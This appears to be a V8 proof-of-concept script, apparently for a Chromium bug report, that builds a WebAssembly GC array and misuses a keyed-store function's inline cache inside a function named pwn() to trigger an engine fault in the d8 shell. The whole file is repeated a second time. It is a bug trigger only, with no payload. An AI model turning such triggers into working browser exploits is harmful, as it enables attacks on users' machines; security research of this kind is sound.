mistymntncop/339736513.js

## 339736513.js
d8.file.execute("wasm-module-builder.js");

let builder = new WasmModuleBuilder();

let array_type = builder.addArray(kWasmI32, true);
builder.addFunction('create_array', makeSig([kWasmI32], [wasmRefType(array_type)]))
    .addBody([
        kExprLocalGet, 0,
        kGCPrefix, kExprArrayNewDefault, array_type,
    ])
.exportFunc();

let wasm_instance = builder.instantiate({});
let wasm = wasm_instance.exports;


function set_keyed_prop(arr, key, val) {
    arr[key] = val;
}

function pwn() {
    for(let i = 0; i < 9; i++) {
        set_keyed_prop([], 0, 0x1337);
    }
    let wasm_array = wasm.create_array(0);

    try {
        set_keyed_prop(wasm_array, "foo", 0x1337);
    } catch(err){ }
    set_keyed_prop([], 0, 0x1337);

    %DebugPrint(set_keyed_prop);

    try {
        set_keyed_prop(wasm_array, 0, 0x1337);
    } catch(err){ }

}
pwn();
	d8.file.execute("wasm-module-builder.js");

	let builder = new WasmModuleBuilder();

	let array_type = builder.addArray(kWasmI32, true);
	builder.addFunction('create_array', makeSig([kWasmI32], [wasmRefType(array_type)]))
	.addBody([
	kExprLocalGet, 0,
	kGCPrefix, kExprArrayNewDefault, array_type,
	])
	.exportFunc();

	let wasm_instance = builder.instantiate({});
	let wasm = wasm_instance.exports;


	function set_keyed_prop(arr, key, val) {
	arr[key] = val;
	}

	function pwn() {
	for(let i = 0; i < 9; i++) {
	set_keyed_prop([], 0, 0x1337);
	}
	let wasm_array = wasm.create_array(0);

	try {
	set_keyed_prop(wasm_array, "foo", 0x1337);
	} catch(err){ }
	set_keyed_prop([], 0, 0x1337);

	%DebugPrint(set_keyed_prop);

	try {
	set_keyed_prop(wasm_array, 0, 0x1337);
	} catch(err){ }

	}
	pwn();